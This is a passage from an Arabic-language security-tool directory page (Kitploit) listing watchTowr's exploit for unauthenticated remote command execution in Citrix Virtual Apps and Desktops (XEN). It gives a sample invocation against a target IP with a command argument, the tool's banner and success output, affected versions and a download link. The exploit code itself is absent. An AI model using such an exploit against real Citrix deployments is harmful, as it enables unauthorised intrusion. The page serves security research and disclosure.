Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Citrix-Virtual-Apps-XEN-Exploit — Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/citrix-virtual-apps-xen-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed Teaming
GitHubwatchtowrlabs/citrix-virtual-apps-xen-exploit

Citrix-Virtual-Apps-XEN-Exploit

Citrix Virtual Apps and Desktops (XEN) Unauthenticated RCE

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
20224منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2024-xxxx

تنفيذ أوامر عن بُعد بدون مصادقة في Citrix Virtual Apps and Desktops (XEN)

انظر منشور مدونتنا للحصول على التفاصيل الفنية

https://github.com/user-attachments/assets/563fd110-5321-49f7-8dc3-48eb0a53e0f9

إثبات المفهوم (PoC) أثناء التنفيذ

root@kitploit:~
python exploit-citrix-xen.py --target 192.168.1.120 --port 80 --cmd "whoami"
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-xxxx-xxxxx.py
        (*) Citrix Virtual Apps and Desktops Unauthenticated Remote Code Execution (CVE-xxxx-xxxxx) exploit by watchTowr

          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])

        CVEs: [CVE-xxxx-xxxxx]

[INFO] Command sent to 192.168.1.120 successfully!

الإصدارات المتأثرة

أي إصدار من Citrix Virtual Apps and Desktops 7 2402 LTSR وما قبله يعتبر معرضًا للخطر، لمزيد من التفاصيل راجع إشعار سيتريكس

مؤلفو الاستغلال

تمت كتابة هذا الاستغلال بواسطة Sina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)

تابع watchTowr Labs

لأحدث الأبحاث الأمنية، تابع فريق watchTowr Labs

  • https://labs.watchtowr.com/
  • https://x.com/watchtowrcyber
تنزيل الأداة